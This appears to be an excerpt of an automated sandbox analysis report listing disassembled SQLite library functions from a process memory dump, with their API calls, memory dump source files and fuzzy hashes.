                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_strglob
                                                                                                    • String ID: $
                                                                                                    • API String ID: 476814121-227171996
                                                                                                    • Opcode ID: d45859bd94aa7d7c435b7c67a8cddfe6e377d919fc8bbdac0b6288aa45c96c6f
                                                                                                    • Instruction ID: 35265239b59b55e4c7ac4d32140c5f1fbc0c98f44576d73b02f3c0820d6b2da3
                                                                                                    • Opcode Fuzzy Hash: d45859bd94aa7d7c435b7c67a8cddfe6e377d919fc8bbdac0b6288aa45c96c6f
                                                                                                    • Instruction Fuzzy Hash: DA214878C0838289D7198BBAD4C075ABFE4FF87319F34D5AEC4958A291EB30C461C742
                                                                                                    Function 61E191AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E191C6
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E1920E
                                                                                                    • sqlite3_stricmp.SQLITE3 ref: 61E19235
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19263
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                    • String ID: a
                                                                                                    • API String ID: 2308590742-581836851
                                                                                                    • Opcode ID: a8e8039b9c4c19759a624d263a5bd64fc13c73cf6fa9d51dae6ad896e830a499
                                                                                                    • Instruction ID: cc82e61c603c8a5912f050e6c8823d03383f9d68c91f2670f3544d1c55b0dd5a
                                                                                                    • Opcode Fuzzy Hash: a8e8039b9c4c19759a624d263a5bd64fc13c73cf6fa9d51dae6ad896e830a499
                                                                                                    • Instruction Fuzzy Hash: C121C670A0C2418BEB11CEA9A4427DB7BE9DFCAB18F35C468DC9887349D775D442C751
                                                                                                    Function 61E1F1AE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_aggregate_context.SQLITE3 ref: 61E1F1C3
                                                                                                    • sqlite3_result_error.SQLITE3 ref: 61E1F1F3
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E1F209
                                                                                                    • sqlite3_result_int64.SQLITE3 ref: 61E1F221
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_aggregate_contextsqlite3_result_doublesqlite3_result_errorsqlite3_result_int64
                                                                                                    • String ID: &a
                                                                                                    • API String ID: 3779139978-2279106107
                                                                                                    • Opcode ID: a7a9d91952da6402b3fc85eb929c098bc9ff5ecb2112afc8fda0e437c74666b0
                                                                                                    • Instruction ID: c7a8ec0e42bf90dd108108ea8e43c42187e1bfdf7df822401585adc389347608
                                                                                                    • Opcode Fuzzy Hash: a7a9d91952da6402b3fc85eb929c098bc9ff5ecb2112afc8fda0e437c74666b0
                                                                                                    • Instruction Fuzzy Hash: FA019EB540C7419FD7109F14E486759BFE0AB85B18F22C99DE4990B2A6D338C488C782
                                                                                                    Function 61E199EE Relevance: 7.7, APIs: 5, Instructions: 212COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19A46
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E19ADC
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19A0D
                                                                                                      • Part of subcall function 61E09B75: sqlite3_mutex_enter.SQLITE3 ref: 61E09B94
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E19C6B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_enter
                                                                                                    • String ID:
                                                                                                    • API String ID: 165182205-0
                                                                                                    • Opcode ID: 0dc32382279109aa12175900852946e1a0375cd8d9686ae5bc1d385b4f56fe90
                                                                                                    • Instruction ID: c404fbe333b87a22cba2c581d9808334469befb54c511682955e2ce2a3c4d7c2
                                                                                                    • Opcode Fuzzy Hash: 0dc32382279109aa12175900852946e1a0375cd8d9686ae5bc1d385b4f56fe90
                                                                                                    • Instruction Fuzzy Hash: AAA1A075D05218DBDF04CFA9D480A8DBBF1BF88314F21852AE859AB358E774A946CF80
                                                                                                    Function 61E50631 Relevance: 7.7, APIs: 5, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E5065A
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E507E7
                                                                                                    • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,61E508DC), ref: 61E507F9
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50810
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50818
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 2921195555-0
                                                                                                    • Opcode ID: d2e484fd3ae75c4034c326f8de4880375a5f328d399ffd7917b498590bb34918
                                                                                                    • Instruction ID: c0aea3a93d8ea2144fc0c2d72865e1cbea41ab2a26ae63e281b9eb9a07cbb3c9
                                                                                                    • Opcode Fuzzy Hash: d2e484fd3ae75c4034c326f8de4880375a5f328d399ffd7917b498590bb34918
                                                                                                    • Instruction Fuzzy Hash: D35148756006428BDB50EFB9C88064AB7B1BF8431CF35C56DEC999B305D739E866CBA0
                                                                                                    Function 61E35B53 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                                    • String ID:
                                                                                                    • API String ID: 4073198082-0
                                                                                                    • Opcode ID: 85f9659fb58b2002a1f5570c31170a7c917a875ab17f1a4ec794fc138f2df255
                                                                                                    • Instruction ID: ca131e19b67b6c75f475db37494c9ada67695e5add3c8d38a458df3fb20179ad
                                                                                                    • Opcode Fuzzy Hash: 85f9659fb58b2002a1f5570c31170a7c917a875ab17f1a4ec794fc138f2df255
                                                                                                    • Instruction Fuzzy Hash: D54159B0A04225CFDB08CF64C48465ABBF1FF88318F29C569E8558B345E735E951CFA1
                                                                                                    Function 61E33C75 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_result_null.SQLITE3 ref: 61E33C97
                                                                                                    • sqlite3_result_int.SQLITE3 ref: 61E33CB6
                                                                                                    • sqlite3_result_int64.SQLITE3 ref: 61E33D6B
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E33D9F
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E33DDC
                                                                                                    • sqlite3_result_text.SQLITE3 ref: 61E33E85
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                                    • String ID:
                                                                                                    • API String ID: 402655203-0
                                                                                                    • Opcode ID: 91c2404dca215de2b219005469dbc2cdeedba4c19bacde79836a5b08faf5f1d1
                                                                                                    • Instruction ID: 88aa2cc9e7bf0b379d4d2f090e7787d9a3c08766b2e86d95f3e28b8903ae6b59
                                                                                                    • Opcode Fuzzy Hash: 91c2404dca215de2b219005469dbc2cdeedba4c19bacde79836a5b08faf5f1d1
                                                                                                    • Instruction Fuzzy Hash: CE416DB4D093A49ECB10DFACC098A9DBBF2ABC9354F65C91EE4949B345C335C881CB12
                                                                                                    Function 61E35C8F Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_value_int.SQLITE3 ref: 61E35CC1
                                                                                                    • sqlite3_mprintf.SQLITE3 ref: 61E35D7C
                                                                                                    • sqlite3_result_error_nomem.SQLITE3 ref: 61E35D8A
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E35DAC
                                                                                                    • sqlite3_result_double.SQLITE3 ref: 61E35DBB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                                                                    • String ID:
                                                                                                    • API String ID: 2195261611-0
                                                                                                    • Opcode ID: d9ac8b4d6d2e7914a929f73aee334b3f69a00112fd8b9810b17f034bc3d650c0
                                                                                                    • Instruction ID: 84c3bc485ae28b15cea9a4d63c3cad7be0fdb9987c99e3a16db8258184c408df
                                                                                                    • Opcode Fuzzy Hash: d9ac8b4d6d2e7914a929f73aee334b3f69a00112fd8b9810b17f034bc3d650c0
                                                                                                    • Instruction Fuzzy Hash: 4D311271E09A69DADF017F81D5881DEBBB0FF88704F658809E88166314E739CC92CB82
                                                                                                    Function 61E50520 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 61E134FC: sqlite3_mutex_try.SQLITE3(?,?,?,61E1357C), ref: 61E1349C
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E50583
                                                                                                    • sqlite3_mutex_free.SQLITE3 ref: 61E505C4
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E505D4
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50603
                                                                                                    • sqlite3_free.SQLITE3 ref: 61E50622
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                    • String ID:
                                                                                                    • API String ID: 1894464702-0
                                                                                                    • Opcode ID: 960ea10271d4fc203d312e5772627d47ad9ad2b08addd12fa90b59a3ae0e68fd
                                                                                                    • Instruction ID: d7f499f12f0180ccd69ae3c2ed0b77737b747c9e29f576d97867e0430118c7ff
                                                                                                    • Opcode Fuzzy Hash: 960ea10271d4fc203d312e5772627d47ad9ad2b08addd12fa90b59a3ae0e68fd
                                                                                                    • Instruction Fuzzy Hash: B2314D34B046428BD764DF69C4C061ABBF6AFC534CB78C569E845CB319E732E892CB81
                                                                                                    Function 61E1CF4C Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_malloc.SQLITE3 ref: 61E1CF5C
                                                                                                      • Part of subcall function 61E18497: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18178,?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E1849F
                                                                                                    • memcmp.MSVCRT ref: 61E1CFCE
                                                                                                    • memcmp.MSVCRT ref: 61E1CFF3
                                                                                                    • memcmp.MSVCRT ref: 61E1D024
                                                                                                    • memcmp.MSVCRT ref: 61E1D050
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 40721531-0
                                                                                                    • Opcode ID: 9e3f36c4c0fabc8e188632fe39f854cff41fe50b8323668d134924b1423a07d0
                                                                                                    • Instruction ID: 10124974f9cd055ed393cdc156a8556424f59d13ec397e0d7a61010eb49106af
                                                                                                    • Opcode Fuzzy Hash: 9e3f36c4c0fabc8e188632fe39f854cff41fe50b8323668d134924b1423a07d0
                                                                                                    • Instruction Fuzzy Hash: E5315574A083058BD7459F69C58535ABBE2FFC4398F25C42DE8888B788D776D842CB41
                                                                                                    Function 61E44759 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E4476E
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E44779
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E44832
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E4483D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                    • String ID:
                                                                                                    • API String ID: 1477753154-0
                                                                                                    • Opcode ID: 8d9f026c996acfe03396313e3723e5a837880399c5019ea7917c3c105b3dd969
                                                                                                    • Instruction ID: f809b40cc892d10f9d6bd1d089d48f966c36716b1a6af909635f28d0ea2cd819
                                                                                                    • Opcode Fuzzy Hash: 8d9f026c996acfe03396313e3723e5a837880399c5019ea7917c3c105b3dd969
                                                                                                    • Instruction Fuzzy Hash: 8F215A747086818BE700AF69D48461AFBE5FF89318F24C45EE8488B345D774D852CB82
                                                                                                    Function 61E34699 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_initialize.SQLITE3 ref: 61E346A7
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E17F65
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E2224D), ref: 61E17F99
                                                                                                      • Part of subcall function 61E17F2E: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E88E), ref: 61E182E4
                                                                                                    • sqlite3_mutex_enter.SQLITE3 ref: 61E346BF
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E346E2
                                                                                                    • sqlite3_mutex_leave.SQLITE3 ref: 61E34726
                                                                                                    • sqlite3_memory_used.SQLITE3 ref: 61E3472B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000013.00000002.627968060.0000000061E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 61E00000, based on PE: true
                                                                                                    • Associated: 00000013.00000002.627961304.0000000061E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627981098.0000000061E8C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627985814.0000000061E8E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627992713.0000000061E9D000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.627997831.0000000061E9E000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628003981.0000000061EA0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628010862.0000000061EA3000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    • Associated: 00000013.00000002.628019116.0000000061EA4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_19_2_61e00000_findstr.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                    • String ID:
                                                                                                    • API String ID: 2853221962-0
                                                                                                    • Opcode ID: 4d99d20ecb47e68f5794c1687de86a5643b1c8b6954479f0dec52b203198caed
                                                                                                    • Instruction ID: c8a7a30a255cf5d17eedbeb20707b985c50125413f8d0f8d6aa6408856a5557a
                                                                                                    • Opcode Fuzzy Hash: 4d99d20ecb47e68f5794c1687de86a5643b1c8b6954479f0dec52b203198caed
                                                                                                    • Instruction Fuzzy Hash: 12115A78B14A659BCB14DFBDD44145A77E1BBCB319B64CA2BE864CB344E731E881CB80
                                                                                                    Function 61E0A94D Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • sqlite3_mutex_enter.SQLITE3(?,?,?,61E14567), ref: 61E0A977
                                                                                                    • sqlite3_mutex_leave.SQLITE3(?,?,?,61E14567), ref: 61E0A9B3
